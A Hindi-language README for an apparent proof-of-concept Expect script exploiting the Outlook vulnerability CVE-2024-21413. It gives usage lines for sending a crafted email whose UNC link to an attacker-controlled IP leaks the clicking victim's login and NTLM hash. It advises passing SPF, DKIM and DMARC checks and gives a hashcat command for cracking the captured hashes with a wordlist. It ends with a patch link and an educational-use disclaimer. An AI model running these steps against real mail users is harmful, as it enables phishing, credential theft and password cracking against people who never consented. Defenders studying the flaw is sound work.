
Microsoft Outlook सूचना प्रकटीकरण भेद्यता (पासवर्ड हैश लीक) - Expect Script POC
Microsoft Outlook लीक क्रेडेंशियल्स और रिमोट कोड एक्ज़ीक्यूशन भेद्यता जब CVE-2023-21716 के साथ जोड़ा जाता है (पूर्वावलोकन पैनल के माध्यम से) CVSS:3.1 9.8 / 8.5
आउटलुक को बाहरी लिंक खोलने पर जोखिम के बारे में आपको चेतावनी देनी चाहिए => लेकिन ऐसा नहीं है!

उपयोग: ./cve-2024-21413.sh mx.fqdn port sender recipient url
./cve-2024-21413.sh mail.mydomain.com 25 [email protected] [email protected] "\\xx.xx.xx.xx\test\duy31.txt"
नोट: chmod +x cve-2024-21413.sh
एप 'expect' की आवश्यकता है और वैध आईपी प्रेषक तथा ईमेल प्रेषक की आवश्यकता है (SPF, DKIM, DMARC पास करने के लिए)



फिर आपको लिंक पर क्लिक करने वाले व्यक्ति का लॉगिन और हैश प्राप्त करना चाहिए (प्रभावित आउटलुक संस्करण पर चेतावनी संकेत के बिना)

फिर आप हैशकैट के साथ पासवर्ड क्रैक करने का प्रयास कर सकते हैं। लॉगिन नाम वाली सभी पंक्तियों को एक फ़ाइल में कॉपी करें और hashcat को मॉड्यूल 5600 के साथ चलाएँ।
hashcat -a 0 -m 5600 hash.txt rockyou.txt -o cracked.txt -O
वर्कअराउंड/फिक्स: [https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413]
मेरे बारे में अधिक ;) https://www.linkedin.com/in/duy-huan-bui/
⚠️ अस्वीकरण: महत्वपूर्ण: यह स्क्रिप्ट केवल शैक्षिक, नैतिक परीक्षण और कानूनी उपयोग के लिए प्रदान की गई है। इसे बिना स्पष्ट अनुमति के किसी भी सिस्टम या नेटवर्क पर उपयोग न करें। कंप्यूटर सिस्टम और नेटवर्क तक अनधिकृत पहुँच अवैध है, और अनधिकृत गतिविधियाँ करते पकड़े गए उपयोगकर्ता कानूनी कार्रवाई के अधीन हैं। इस स्क्रिप्ट के दुरुपयोग से हुई किसी भी क्षति के लिए लेखक उत्तरदायी नहीं है।